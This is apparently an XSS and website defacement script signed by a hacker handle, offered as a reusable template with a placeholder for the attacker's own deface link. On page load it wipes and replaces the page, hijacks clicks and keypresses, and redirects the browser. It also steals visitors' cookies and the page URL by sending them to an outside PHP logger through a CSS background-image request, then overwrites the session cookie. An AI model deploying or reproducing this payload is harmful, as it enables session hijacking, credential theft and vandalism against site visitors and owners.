/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Ter hacked :v"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tumblr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("salam dari si0i");}
document.onkeydown=keypressed;
function meow(){
alert('have a nice moment :)');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('hey hey hey si0i disini :)');",3000);
else setTimeout("meow()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://cdn.statically.io/gh/raalmuhtar/script/0b4fc664/data.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='Ganti dgn link hasil deface/mirror elu' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}